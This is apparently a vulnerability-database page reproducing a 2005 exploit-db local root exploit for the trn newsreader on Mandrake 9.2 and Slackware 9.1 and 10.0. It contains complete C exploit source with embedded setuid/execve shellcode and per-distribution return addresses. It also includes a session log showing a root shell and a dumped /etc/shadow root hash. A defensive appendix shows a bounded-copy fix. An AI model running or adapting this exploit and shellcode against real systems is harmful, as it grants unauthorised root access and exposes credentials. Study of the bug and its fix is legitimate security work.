Mandrake / Slackware /usr/bin/trn – Local Privilege Escalation (Not SUID)

Vulnerability ID: 1054873
Vulnerability type: (not given)
Published: 2005-01-26    Updated: 2005-01-26
CVE number: N/A
CNNVD ID: N/A
Platform: Linux    CVSS score: N/A
| Source
https://www.exploit-db.com/exploits/776
| Details
Vulnerability details have not yet been disclosed.
| Exploit
/*
/usr/bin/trn local root exploit
By ZzagorR - http://www.rootbinbash.com
*/
/*
 sh-2.05b$ ./trn
  usage   : ./trn ret buf
  example : ./trn 0xbfffff64
  [+] mandrake   9.2  = 0xbfffff96
  [+] slackware 10.0.0= 0xbfffff98
  [+] slackware  9.1.0= 0xbfffff84
 sh-2.05b$
 sh-2.05b$ ./trn 0xbfffff84 128
  [BOO  %] 128
  [RET  %] bfffff84
 sh-2.05b#
 sh-2.05b# id
  uid=0(root) gid=98(nobody) groups=98(nobody)
 sh-2.05b# cat /etc/shadow
  root:$1$N88/N.aP$dBWcFHiYCXXNb77Y5LPNK1:12705:0:::::
TEST :
 MANDRAKE 9.2
 SLACKWARE 10.0.0
 SLACKWARE 9.1.0
 http://www.rootbinbash.com/d0kum4n/trn-test.txt
BOO:
 $trn `perl -e 'print "A" x 120'`
 $trn `perl -e 'print "A" x 124'`
 $trn `perl -e 'print "A" x 128'`
  Segmentation fault
BOO=128
*/

#include <stdio.h>
#include <stdlib.h>   /* exit, strtoul, atoi */
#include <string.h>
#include <unistd.h>   /* execl */
#define NEREDE "/usr/bin/trn"

/* payload shipped with the original exploit (escape sequences restored) */
char caylarbeles[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\x31\xc0\x50\x68\x2f\x2f\x73\x68"
"\x68\x2f\x62\x69\x6e\x89\xe3\x50"
"\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

int main(int argc, char *argv[]){
 int bizim;
 char bufe[1000];
 char *tayfasi;
 if (argc < 3) {
  printf ("{           trn l0c4l r00t 3xpl01t          }\n");
  printf ("{  By ZzagorR - http://www.rootbinbash.com  }\n");
  printf ("{  usage   : %s ret buf                  }\n",argv[0]);
  printf ("{  example : %s 0xbfffff99 142           }\n",argv[0]);
  printf ("{  mandrake   9.2   = 0xbfffff96            }\n");
  printf ("{  slackware 10.0.0 = 0xbfffff98            }\n");
  printf ("{  slackware  9.1.0 = 0xbfffff84            }\n");
  exit(1);
 }else{
  unsigned long RET=strtoul(argv[1], NULL, 16);  /* return address, given in hex */
  int BOO = atoi(argv[2]);                       /* offset at which RET is written */
   printf ("[BOO  %%] %i\n",BOO);
   printf ("[RET  %%] %lx\n",RET);
  tayfasi = bufe;
  /* fill with 'A' and place the payload so that it ends at byte 256 */
  memset(bufe, 0x41,256-strlen(caylarbeles));
  sprintf(bufe+256-strlen(caylarbeles), "%s", caylarbeles);
  /* write RET at offsets BOO and BOO+4 */
  for ( bizim = BOO; bizim <= BOO+4; bizim+= 4 )
   *(long*)(tayfasi+bizim) = RET;
  execl(NEREDE, NEREDE , bufe, NULL);
 }
 return 0;
}

// milw0rm.com [2005-01-26]
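The BOO section in the header finds the crash offset by lengthening the argument until trn segfaults, which is the signature of an unbounded copy of a command-line argument into a fixed-size stack buffer. The C program below is an added example, not code from the original exploit or from trn: it shows that bug class next to a bounded copy that rejects over-long input instead of overrunning, and a probe() helper that feeds the bounded copy 'A'-strings of the lengths used above. The 128-byte buffer size and all function names are assumptions for illustration; trn's actual buffer and code are not on this page.

```c
#include <stdio.h>
#include <string.h>

/* Assumed buffer size for illustration only; trn's real size is not given on the page. */
#define ARG_BUF 128

/* The bug class: unbounded copy from an attacker-controlled argument into a
   fixed stack buffer. Kept for contrast with the bounded form; never called
   by the test because it is undefined behaviour on long input. */
int copy_arg_unbounded(char *dst, const char *arg) {
    strcpy(dst, arg);          /* writes strlen(arg)+1 bytes regardless of dst size */
    return (int)strlen(dst);
}

/* Hardened form: check the length before copying, reject anything that would
   not fit together with the terminator, and always leave dst NUL-terminated.
   Returns the number of bytes copied, or -1 when the argument is rejected. */
int copy_arg_bounded(char *dst, size_t dst_size, const char *arg) {
    size_t n = strlen(arg);
    if (dst_size == 0)
        return -1;
    if (n >= dst_size) {       /* n + 1 > dst_size: would overflow */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, arg, n + 1);
    return (int)n;
}

/* Construct an argument of `len` bytes of 'A', like the perl one-liners in the
   header, and run it through the bounded copy. Returns -2 if the requested
   length does not fit the local scratch buffer. */
int probe(size_t len) {
    char arg[1024];
    char dst[ARG_BUF];
    if (len >= sizeof arg)
        return -2;
    memset(arg, 'A', len);
    arg[len] = '\0';
    return copy_arg_bounded(dst, sizeof dst, arg);
}

int main(void) {
    size_t lens[] = {120, 124, 127, 128, 256};
    for (size_t i = 0; i < sizeof lens / sizeof lens[0]; i++)
        printf("len %zu -> %d\n", lens[i], probe(lens[i]));
    return 0;
}
```

Running it shows that 120, 124 and 127 bytes are accepted while 128 and 256 are rejected with -1; with the bounded copy the "add bytes until it segfaults" probing in the header never reaches a crash, because the length check fails closed before any write past the buffer.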
